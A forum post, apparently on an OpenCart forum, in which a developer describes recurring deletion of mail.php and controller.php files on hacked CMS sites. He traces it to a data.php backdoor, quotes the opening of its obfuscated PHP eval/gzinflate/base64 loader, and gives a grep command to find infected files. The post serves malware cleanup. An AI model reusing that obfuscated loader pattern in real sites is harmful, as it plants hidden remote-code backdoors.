Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Докопался: удаление файлов mail.php и controller.php


streetr

Recommended Posts

Всем привет, последнее время часто заказывают исправление проблемы с удалением файла mail.php и иногда controller.php, Чаще всего обращаются по сайтам на opencart (может потому что основная специальность у меня по нему) но и wordpress, joomla так же страдают такой траблой. Естественно вирус, естественно чистим, но все равно файлы пропадают через некоторое время. Ну начал я наблюдать активно за одним из таких сайтов, и нашел все таки в логах обращение с POST запросом к файлу data.php (почему то не один из антивиров типа айболита не подозревал этот код) (полный путь писать смысла нету, у всех лежит в разных папках) и картинка с именем data.jpg (не у всех клиентов был такой, а у некоторых имя другое, ищем в содержании файла по слову описанному ниже)

содержание файла примерно такое 

 

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54).

После поиска по всем файлам на сайте по слову YLbgPfj524  ( grep -rl 'YLbgPfj524' /PATH_TO_SITE/ ) вычистил весь подобный хлам, и УРА все тихо. Вирус однотипный, так как содержание файла data.php у всех одинаковое, клиенты часть новые, от меня заражения быть у них не могло, проблемы, код вируса и имена файлов у всех одинаковы.

P>S написать решил имеено сюда,  как так когда искал инфу по проблеме, находил топики

http://searchengines.guru/showthread.php?t=914314

И такой каталог был на сервере, только в корне

https://opencartforum.com/topic/52058-наверное-взломали/

Змінено користувачем streetr
Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.